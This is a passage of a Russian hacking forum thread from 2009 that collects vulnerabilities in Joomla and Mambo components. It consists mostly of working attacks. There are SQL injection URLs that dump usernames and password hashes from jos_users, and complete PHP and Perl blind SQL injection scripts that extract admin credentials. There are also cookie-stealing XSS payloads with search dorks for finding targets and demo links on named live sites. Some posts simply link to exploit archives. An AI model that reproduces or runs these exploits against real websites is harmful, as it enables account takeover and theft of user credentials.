ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #121  
Старый 14.01.2009, 11:50
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Joomla

Компонент: Fantasytournament (com_fantasytournament)
Version: 2009.1.5
Уязвимость: SQL-injection

Код:
http://localhost/Path/index.php?option=com_fantasytournament&func=teamsByRound&Itemid=79&roundID=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6+from+jos_users--
Код:
http://localhost/Path/index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=63&managerTeamName=pacman&roundID=-1+union+select+1,concat(username,char(58),password)KHG,3+from+jos_users--
Код:
http://localhost/Path/index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=-63+union+select+concat(username,char(58),password)KHG,2,3+from+jos_users--
Author:"Adrian Gray"

Компонент: Camelcitydb2 (com_camelcitydb2)
Version: 2.2
Уязвимость: SQL-injection

Код:
http://localhost/Path/index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11+from+jos_users--&view=detail&Itemid=15
Author:"Noel Hunter"

Последний раз редактировалось z00MAN; 14.01.2009 в 11:55..
 
Ответить с цитированием

  #122  
Старый 15.01.2009, 21:04
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Joomla

Компонент: com_Eventing 1.6.x
Уязвимость: SQL Injection Exploit
PHP код:
<?php
ini_set
("max_execution_time",0);
print_r('
##############################################################################
#
#                Joomla com_Eventing Blind SQL Injection Exploit
#
#                             ===  Cyb3R-1st  ===
#                           cyb3r-1st@hormail.com
#                      == Writing by Stack - thx m8 - ==
#
# usage : php file.php "http://site.me/index.php?option=com_eventing&catid=1"
#
##############################################################################
'
);
if (
$argc 1) {
$url $argv[1];
$r strlen(file_get_contents($url."+and+1=1--"));
echo 
"\nExploiting:\n";
$w strlen(file_get_contents($url."+and+1=0--"));
$t abs((100-($w/$r*100)));
echo 
"Username: ";
for (
$i=1$i <= 30$i++) {
$laenge strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--"));
   if (
abs((100-($laenge/$r*100))) > $t-1) {
      
$count $i;
      
$i 30;
   }
}
for (
$j 1$j $count$j++) {
   for (
$i 46$i <= 122$i=$i+2) {
      if (
$i == 60) {
         
$i 98;
      }
      
$laenge strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
      if (
abs((100-($laenge/$r*100))) > $t-1) {
         
$laenge strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
         if (
abs((100-($laenge/$r*100))) > $t-1) {
            echo 
chr($i-1);
         } else {
            echo 
chr($i);
         }
         
$i 122;
      }
   }
}
echo 
"\nPassword: ";
for (
$j 1$j <= 49$j++) {
   for (
$i 46$i <= 102$i=$i+2) {
      if (
$i == 60) {
         
$i 98;
      }
      
$laenge strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
      if (
abs((100-($laenge/$r*100))) > $t-1) {
         
$laenge strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
         if (
abs((100-($laenge/$r*100))) > $t-1) {
            echo 
chr($i-1);
         } else {
            echo 
chr($i);
         }
         
$i 102;
      }
   }
}

?>

# milw0rm.com [2009-01-15]
Компонент: RD-Autos 1.5.2
Уязвимость: SQL Injection Vulnerability

[~] Exploit
Код:
/index.php?option=com_rdautos&view=category&id=[SQL]&Itemid=54
[~] Example
Код:
/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+from+jos_users--&Itemid=54

Последний раз редактировалось z00MAN; 16.01.2009 в 16:22..
 
Ответить с цитированием

  #123  
Старый 20.01.2009, 12:12
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Joomla

Компонент: Gigcal 1.x
Уязвимость: SQL Injection Vulnerability
Exploit :
Код:
http://localhost/index.php?option=com_gigcal&Itemid=78&id=-999+union+all+select+1,2,3,4,5,6,7,8,9,concat(username,char(58),password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
Компонент: com_pccookbook
Уязвимость: Blind SQL Injection Exploit

Код HTML:
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
  print "                                                                        \n";                                                             
  print "  #########################################################################\n";
  print "  #   \n";
  print "  #            Joomla com_pccookbook Blind sql injection exploit \n";
  print "  #   \n";
  print "  #                              Cyb3R-1sT \n";
  print "  #                       cyb3r-1st[at]hotmail.com \n";
  print "  #   \n";
  print "  #                Usage:perl file.pl host path <options> \n";
  print "  #            example: perl file.pl www.host.com /joomla/ -a 7 \n";
  print "  #   \n";
  print "  #                           Options:  -a id \n";
  print "  #   \n";
  print "  #########################################################################\n";
  exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $userid  = 1;
my $aid     = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "a=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
  $userid = $options{"u"};
}

if($options{"a"})
{
  $aid = $options{"a"};
}

syswrite(STDOUT, "[~] Password: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
  my $f = 0;
  my $h = 48;
  while(!$f && $h <= 57)
  {
    if(istrue2($host, $path, $userid, $aid, $i, $h))
    {
      $f = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$f)
  {
    $h = 97;
    while(!$f && $h <= 122)
    {
      if(istrue2($host, $path, $userid, $aid, $i, $h))
      {
        $f = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}

print "\n[~] Exploiting done\n";

sub istrue2
{
  my $host  = shift;
  my $path  = shift;
  my $uid   = shift;
  my $aid   = shift;
  my $i     = shift;
  my $h     = shift;
 
  my $ua = LWP::UserAgent->new;
  my $query = "http://".$host.$path."index.php?option=com_pccookbook&page=viewrecipe&recipe_id=".$aid." and ascii(SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
 
  if($options{"p"})
  {
    $ua->proxy('http', "http://".$options{"p"});
  }
 
  my $resp = $ua->get($query);
  my $content = $resp->content;
  my $regexp = "Ingredients";
 
  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }

}
Компонент: com_news
Уязвимость: SQL Injection Vulnerability

Exploit:
Код:
http://localhost/index.php?option=com_news&id=-148+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users--
Компонент: com_waticketsystem
Уязвимость: Blind SQL Injection Exploit
PHP код:
<?php
ini_set
("max_execution_time",0);
print_r('
##############################################################################
#
#                Joomla com_waticketsystem Blind SQL Injection Exploit
#
#                             ===  Cyb3R-1st  ===
#                           cyb3r-1st@hormail.com
#                            == inject0r5 t3am ==
#
#    usegae : php file.php "http://site/index.php?option=com_waticketsystem&act=category&catid=1"
#
##############################################################################
'
);
if (
$argc 1) {
$url $argv[1];
$r strlen(file_get_contents($url."+and+1=1--"));
echo 
"\nExploiting:\n";
$w strlen(file_get_contents($url."+and+1=0--"));
$t abs((100-($w/$r*100)));
echo 
"Username: ";
for (
$i=1$i <= 30$i++) {
$laenge strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--"));
   if (
abs((100-($laenge/$r*100))) > $t-1) {
      
$count $i;
      
$i 30;
   }
}
for (
$j 1$j $count$j++) {
   for (
$i 46$i <= 122$i=$i+2) {
      if (
$i == 60) {
         
$i 98;
      }
      
$laenge strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
      if (
abs((100-($laenge/$r*100))) > $t-1) {
         
$laenge strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
         if (
abs((100-($laenge/$r*100))) > $t-1) {
            echo 
chr($i-1);
         } else {
            echo 
chr($i);
         }
         
$i 122;
      }
   }
}
echo 
"\nPassword: ";
for (
$j 1$j <= 49$j++) {
   for (
$i 46$i <= 102$i=$i+2) {
      if (
$i == 60) {
         
$i 98;
      }
      
$laenge strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
      if (
abs((100-($laenge/$r*100))) > $t-1) {
         
$laenge strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
         if (
abs((100-($laenge/$r*100))) > $t-1) {
            echo 
chr($i-1);
         } else {
            echo 
chr($i);
         }
         
$i 102;
      }
   }
}

?>
 
Ответить с цитированием

  #124  
Старый 22.01.2009, 18:18
swt1
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме:
3370466

Репутация: 96
По умолчанию

Joomla Component beamospetition 1.0.12 SQL Injection / XSS
_______
http://www.milw0rm.com/exploits/7847
:::::

Joomla com_pcchess (game_id) Blind SQL Injection Exploit
_______
http://www.milw0rm.com/exploits/7846
:::::

Mambo Component SOBI2 RC 2.8.2 (bid) SQL Injection Vulnerability
_______
http://www.milw0rm.com/exploits/7841
:::::

Joomla Com BazaarBuilder Shopping Cart v.5.0 SQL Injection Exploit
_______
http://www.milw0rm.com/exploits/7840
 
Ответить с цитированием

Уязвимости компонентов Joomla\Mambo
  #125  
Старый 23.01.2009, 05:02
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию Уязвимости компонентов Joomla\Mambo

XSS

Joomla Component Reservation Manager
Version: 1.7 (last update on Oct 3, 2008)
Type: Commercial (99$)
Vulnerable parametre: year
Exploit: "><script>alert(document.cookie)</script>
Dork: "inurl:com_resman"
Demo: http://resman.webformatique.com/index.php?option=com_resman&task=moreinfo&id=1&yea r=2010"><script>alert(document.cookie)</script>

Joomla Component Car Manager
Version: 2.1 (last update on Jan 6, 2009)
Type: Commercial (129$)
Vulnerable parametre: msg
Exploit: "><script>alert(document.cookie)</script>
Dork: "inurl:com_carman"
Demo: http://carman.webformatique.com/index.php?option=com_carman&msg="><script>alert(do cument.cookie)</script>

Joomla Component Time Slot Registration
Version: 1.0.5 (last update on Mar 26, 2008)
Type: Non-Commercial
Vulnerable parametre: entity
Exploit: "><script>alert(document.cookie)</script>
Dork: "inurl:com_time_slot_registration"
Demo: http://resadon.fr/index.php?option=com_time_slot_registration&task=v iewEventsList&entity="><script>alert(document.cook ie)</script>

Joomla Component Hire Manager
Version: 1.2 (last update on Oct 3, 2008)
Type: Commercial (99$)
Vulnerable parametre: msg
Exploit: "><script>alert(document.cookie)</script>
Dork: "inurl:com_hireman"
Demo: http://hireman.webformatique.com/index.php?option=com_hireman&msg="><script>alert(d ocument.cookie)</script>

Joomla Component hwdCourses beta
Version: 1.1.1 (last update on Apr 29, 2008)
Type: Non-Commercial
Vulnerable parametre: dif, type
Exploit: "><script>alert(document.cookie)</script>
Dork: "inurl:com_hwdcourses"
Demo: http://www.voc.org/index.php?option=com_hwdcourses&Itemid=114&type=Cl assic"><script>alert(document.cookie)</script>
__________________
Feci, quod potui. Faciant meliora potentes.
 
Ответить с цитированием

  #126  
Старый 26.01.2009, 14:25
swt1
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме:
3370466

Репутация: 96
По умолчанию

Mambo com_sim v0.8 Blind SQL Injection Exploit
_______
http://www.milw0rm.com/exploits/7860
 
Ответить с цитированием

  #127  
Старый 14.02.2009, 14:03
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Joomla com_flashmagazinedeluxe (mag_id) SQL Injection Vulnerability
exploit:
Код:
http://localhost/index.php?option=com_flashmagazinedeluxe&Itemid=10&task=magazine&mag_id=-4+SQL
Код:
union+select+1,2,3,unhex(hex(version())),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/*
источник:http://milw0rm.com/
--------------------------------------------------------------
The End!
 
Ответить с цитированием

  #128  
Старый 24.02.2009, 11:10
грамбукса
Новичок
Регистрация: 05.02.2009
Сообщений: 3
Провел на форуме:
24096

Репутация: 1
По умолчанию

может было.. затрете, если да.

нашел такой сайтец _http://www.joomlascan.com
- сканировал 1.0.13 с модулем com_datsogallery и нифига не нашло - может кому больше повезет

еще одна тулза - _http://sourceforge.net/projects/joomscan/
вроде живой проект.

Последний раз редактировалось грамбукса; 24.02.2009 в 12:12..
 
Ответить с цитированием

  #129  
Старый 08.03.2009, 19:16
Dr.Frank
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
Провел на форуме:
1212427

Репутация: 187
Отправить сообщение для Dr.Frank с помощью ICQ
По умолчанию

Компонент com_xevidmegafx
Sql-inj
уязвимость в параметре id:
Цитата:
http://site.com/index.php?option=com_xevidmegafx&Itemid=34&func=de tail&id=28{SQLINJ}
19 столбцов
по идее можно попробывать +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19--
но не нашел выводимые поля, поэтому перебирал как Blind SQL
 
Ответить с цитированием

  #130  
Старый 11.03.2009, 01:47
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

Код:
############################################
#  Joomla Djice Shoutbox v 1.0 <= Permanent XSS vulnerability  #
############################################
 
- dork: inurl:"index.php?option=com_djiceshoutbox"
 
The script is affected by Permanent XSS vulnerability, so yuo can put in bad java script code like:
 
"><script>alert('XaDoS')</script>
 
or

'">><script>alert('XSS By XaDoS')</script>
 
the XSS become permanent in every page of site!
not critical damage but it's not funny..
 
[+] D3M0:
 
http://www.djiceatwork.com
 
contact me at xados @ hotmail . it
www.securitycode.it

# milw0rm.com [2009-03-10]
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей в форумных движках] Grey Форумы 48 28.12.2009 20:03
Обзор бесплатных Cms em00s7 PHP, PERL, MySQL, JavaScript 16 03.07.2009 13:13
Cms Cawabunga PHP, PERL, MySQL, JavaScript 20 05.08.2007 00:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ